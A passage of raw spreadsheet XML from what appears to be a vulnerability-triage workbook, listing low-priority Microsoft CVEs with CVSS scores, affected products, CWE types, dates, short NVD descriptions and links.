network.</t></is></c><c r="T1103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t></is></c></row><row r="1104"><c r="A1104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1104" s="5" t="inlineStr"><is><t>CVE-2026-69395</t></is></c><c r="D1104" s="5" t="n"><v>6.5</v></c><c r="E1104" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1104" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1104" s="5" t="inlineStr" /><c r="H1104" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1104" s="5" t="inlineStr" /><c r="J1104" s="5" t="inlineStr" /><c r="K1104" s="5" t="inlineStr" /><c r="L1104" s="5" t="inlineStr" /><c r="M1104" s="5" t="inlineStr" /><c r="N1104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1104" s="5" t="inlineStr" /><c r="R1104" s="5" t="inlineStr"><is><t>CWE-134</t></is></c><c r="S1104" s="5" t="inlineStr"><is><t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t></is></c></row><row r="1105"><c r="A1105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1105" s="5" t="inlineStr"><is><t>CVE-2026-69409</t></is></c><c r="D1105" s="5" t="n"><v>6.5</v></c><c r="E1105" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1105" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1105" s="5" t="inlineStr" /><c r="H1105" s="5" t="n"><v>0.01</v></c><c r="I1105" s="5" t="inlineStr" /><c r="J1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1105" s="5" t="inlineStr" /><c r="M1105" s="5" t="inlineStr" /><c r="N1105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1105" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1105" s="5" t="inlineStr" /><c r="R1105" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S1105" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t></is></c></row><row r="1106"><c r="A1106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1106" s="5" t="inlineStr"><is><t>CVE-2026-69497</t></is></c><c r="D1106" s="5" t="n"><v>6.5</v></c><c r="E1106" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1106" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1106" s="5" t="inlineStr" /><c r="H1106" s="5" t="n"><v>0.011</v></c><c r="I1106" s="5" t="inlineStr" /><c r="J1106" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1106" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1106" s="5" t="inlineStr" /><c r="M1106" s="5" t="inlineStr" /><c r="N1106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1106" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1106" s="5" t="inlineStr" /><c r="R1106" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1106" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t></is></c></row><row r="1107"><c r="A1107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1107" s="5" t="inlineStr"><is><t>CVE-2026-69562</t></is></c><c r="D1107" s="5" t="n"><v>6.5</v></c><c r="E1107" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1107" s="5" t="inlineStr" /><c r="H1107" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1107" s="5" t="inlineStr" /><c r="J1107" s="5" t="inlineStr" /><c r="K1107" s="5" t="inlineStr" /><c r="L1107" s="5" t="inlineStr" /><c r="M1107" s="5" t="inlineStr" /><c r="N1107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1107" s="5" t="inlineStr" /><c r="R1107" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1107" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69562</t></is></c></row><row r="1108"><c r="A1108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1108" s="5" t="inlineStr"><is><t>CVE-2026-69624</t></is></c><c r="D1108" s="5" t="n"><v>6.5</v></c><c r="E1108" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1108" s="5" t="inlineStr" /><c r="H1108" s="5" t="n"><v>0.007</v></c><c r="I1108" s="5" t="inlineStr" /><c r="J1108" s="5" t="inlineStr" /><c r="K1108" s="5" t="inlineStr" /><c r="L1108" s="5" t="inlineStr" /><c r="M1108" s="5" t="inlineStr" /><c r="N1108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1108" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1108" s="5" t="inlineStr" /><c r="R1108" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S1108" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t></is></c></row><row r="1109"><c r="A1109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1109" s="5" t="inlineStr"><is><t>CVE-2026-69626</t></is></c><c r="D1109" s="5" t="n"><v>6.5</v></c><c r="E1109" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1109" s="5" t="inlineStr" /><c r="H1109" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1109" s="5" t="inlineStr" /><c r="J1109" s="5" t="inlineStr" /><c r="K1109" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1109" s="5" t="inlineStr" /><c r="M1109" s="5" t="inlineStr" /><c r="N1109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1109" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1109" s="5" t="inlineStr" /><c r="R1109" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1109" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t></is></c></row><row r="1110"><c r="A1110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1110" s="5" t="inlineStr"><is><t>CVE-2026-69636</t></is></c><c r="D1110" s="5" t="n"><v>6.5</v></c><c r="E1110" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1110" s="5" t="inlineStr" /><c r="H1110" s="5" t="n"><v>0.01</v></c><c r="I1110" s="5" t="inlineStr" /><c r="J1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1110" s="5" t="inlineStr" /><c r="M1110" s="5" t="inlineStr" /><c r="N1110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1110" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1110" s="5" t="inlineStr" /><c r="R1110" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1110" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t></is></c></row><row r="1111"><c r="A1111" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1111" s="5" t="inlineStr"><is><t>CVE-2026-69719</t></is></c><c r="D1111" s="5" t="n"><v>6.5</v></c><c r="E1111" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1111" s="5" t="inlineStr" /><c r="H1111" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1111" s="5" t="inlineStr" /><c r="J1111" s="5" t="inlineStr" /><c r="K1111" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1111" s="5" t="inlineStr" /><c r="M1111" s="5" t="inlineStr" /><c r="N1111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1111" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1111" s="5" t="inlineStr" /><c r="R1111" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1111" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t></is></c></row><row r="1112"><c r="A1112" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1112" s="5" t="inlineStr"><is><t>CVE-2026-69734</t></is></c><c r="D1112" s="5" t="n"><v>6.5</v></c><c r="E1112" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1112" s="5" t="inlineStr" /><c r="H1112" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1112" s="5" t="inlineStr" /><c r="J1112" s="5" t="inlineStr" /><c r="K1112" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1112" s="5" t="inlineStr" /><c r="M1112" s="5" t="inlineStr" /><c r="N1112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1112" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1112" s="5" t="inlineStr" /><c r="R1112" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1112" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t></is></c></row><row r="1113"><c r="A1113" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1113" s="5" t="inlineStr"><is><t>CVE-2026-69781</t></is></c><c r="D1113" s="5" t="n"><v>6.5</v></c><c r="E1113" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1113" s="5" t="inlineStr" /><c r="H1113" s="5" t="n"><v>0.005</v></c><c r="I1113" s="5" t="inlineStr" /><c r="J1113" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1113" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1113" s="5" t="inlineStr" /><c r="M1113" s="5" t="inlineStr" /><c r="N1113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1113" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1113" s="5" t="inlineStr" /><c r="R1113" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1113" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t></is></c><c r="T1113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t></is></c></row><row r="1114"><c r="A1114" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1114" s="5" t="inlineStr"><is><t>CVE-2026-69839</t></is></c><c r="D1114" s="5" t="n"><v>6.5</v></c><c r="E1114" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1114" s="5" t="inlineStr" /><c r="H1114" s="5" t="n"><v>0.011</v></c><c r="I1114" s="5" t="inlineStr" /><c r="J1114" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1114" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1114" s="5" t="inlineStr" /><c r="M1114" s="5" t="inlineStr" /><c r="N1114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1114" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1114" s="5" t="inlineStr" /><c r="R1114" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S1114" s="5" t="inlineStr"><is><t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t></is></c><c r="T1114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t></is></c></row><row r="1115"><c r="A1115" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1115" s="5" t="inlineStr"><is><t>CVE-2026-70019</t></is></c><c r="D1115" s="5" t="n"><v>6.5</v></c><c r="E1115" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1115" s="5" t="inlineStr" /><c r="H1115" s="5" t="n"><v>0.011</v></c><c r="I1115" s="5" t="inlineStr" /><c r="J1115" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1115" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1115" s="5" t="inlineStr" /><c r="M1115" s="5" t="inlineStr" /><c r="N1115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1115" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1115" s="5" t="inlineStr" /><c r="R1115" s="5" t="inlineStr"><is><t>CWE-65</t></is></c><c r="S1115" s="5" t="inlineStr"><is><t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t></is></c></row><row r="1116"><c r="A1116" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1116" s="5" t="inlineStr"><is><t>CVE-2026-72938</t></is></c><c r="D1116" s="5" t="n"><v>6.5</v></c><c r="E1116" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1116" s="5" t="inlineStr" /><c r="H1116" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1116" s="5" t="inlineStr" /><c r="J1116" s="5" t="inlineStr" /><c r="K1116" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1116" s="5" t="inlineStr" /><c r="M1116" s="5" t="inlineStr" /><c r="N1116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1116" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1116" s="5" t="inlineStr" /><c r="R1116" s="5" t="inlineStr"><is><t>CWE-822, CWE-843</t></is></c><c r="S1116" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t></is></c></row><row r="1117"><c r="A1117" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1117" s="5" t="inlineStr"><is><t>CVE-2026-72939</t></is></c><c r="D1117" s="5" t="n"><v>6.5</v></c><c r="E1117" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1117" s="5" t="inlineStr" /><c r="H1117" s="5" t="n"><v>0.011</v></c><c r="I1117" s="5" t="inlineStr" /><c r="J1117" s="5" t="inlineStr" /><c r="K1117" s="5" t="inlineStr" /><c r="L1117" s="5" t="inlineStr" /><c r="M1117" s="5" t="inlineStr" /><c r="N1117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1117" s="5" t="inlineStr" /><c r="R1117" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1117" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t></is></c></row><row r="1118"><c r="A1118" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1118" s="5" t="inlineStr"><is><t>CVE-2026-72942</t></is></c><c r="D1118" s="5" t="n"><v>6.5</v></c><c r="E1118" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1118" s="5" t="inlineStr" /><c r="H1118" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1118" s="5" t="inlineStr" /><c r="J1118" s="5" t="inlineStr" /><c r="K1118" s="5" t="inlineStr" /><c r="L1118" s="5" t="inlineStr" /><c r="M1118" s="5" t="inlineStr" /><c r="N1118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1118" s="5" t="inlineStr" /><c r="R1118" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1118" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t></is></c></row><row r="1119"><c r="A1119" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1119" s="5" t="inlineStr"><is><t>CVE-2026-72956</t></is></c><c r="D1119" s="5" t="n"><v>6.5</v></c><c r="E1119" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1119" s="5" t="inlineStr" /><c r="H1119" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1119" s="5" t="inlineStr" /><c r="J1119" s="5" t="inlineStr" /><c r="K1119" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1119" s="5" t="inlineStr" /><c r="M1119" s="5" t="inlineStr" /><c r="N1119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1119" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1119" s="5" t="inlineStr" /><c r="R1119" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1119" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t></is></c></row><row r="1120"><c r="A1120" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1120" s="5" t="inlineStr"><is><t>CVE-2026-72974</t></is></c><c r="D1120" s="5" t="n"><v>6.5</v></c><c r="E1120" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1120" s="5" t="inlineStr" /><c r="H1120" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1120" s="5" t="inlineStr" /><c r="J1120" s="5" t="inlineStr" /><c r="K1120" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1120" s="5" t="inlineStr" /><c r="M1120" s="5" t="inlineStr" /><c r="N1120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1120" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1120" s="5" t="inlineStr" /><c r="R1120" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1120" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t></is></c></row><row r="1121"><c r="A1121" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1121" s="5" t="inlineStr"><is><t>CVE-2026-72975</t></is></c><c r="D1121" s="5" t="n"><v>6.5</v></c><c r="E1121" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1121" s="5" t="inlineStr" /><c r="H1121" s="5" t="n"><v>0.007</v></c><c r="I1121" s="5" t="inlineStr" /><c r="J1121" s="5" t="inlineStr" /><c r="K1121" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1121" s="5" t="inlineStr" /><c r="M1121" s="5" t="inlineStr" /><c r="N1121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1121" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1121" s="5" t="inlineStr" /><c r="R1121" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1121" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t></is></c></row><row r="1122"><c r="A1122" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1122" s="5" t="inlineStr"><is><t>CVE-2026-72977</t></is></c><c r="D1122" s="5" t="n"><v>6.5</v></c><c r="E1122" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1122" s="5" t="inlineStr" /><c r="H1122" s="5" t="n"><v>0.01</v></c><c r="I1122" s="5" t="inlineStr" /><c r="J1122" s="5" t="inlineStr" /><c r="K1122" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1122" s="5" t="inlineStr" /><c r="M1122" s="5" t="inlineStr" /><c r="N1122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1122" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1122" s="5" t="inlineStr" /><c r="R1122" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1122" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t></is></c></row><row r="1123"><c r="A1123" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1123" s="5" t="inlineStr"><is><t>CVE-2026-73029</t></is></c><c r="D1123" s="5" t="n"><v>6.5</v></c><c r="E1123" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1123" s="5" t="inlineStr" /><c r="H1123" s="5" t="n"><v>0.007</v></c><c r="I1123" s="5" t="inlineStr" /><c r="J1123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1123" s="5" t="inlineStr" /><c r="M1123" s="5" t="inlineStr" /><c r="N1123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1123" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1123" s="5" t="inlineStr" /><c r="R1123" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1123" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t></is></c></row><row r="1124"><c r="A1124" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1124" s="5" t="inlineStr"><is><t>CVE-2026-76000</t></is></c><c r="D1124" s="5" t="n"><v>6.5</v></c><c r="E1124" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1124" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c 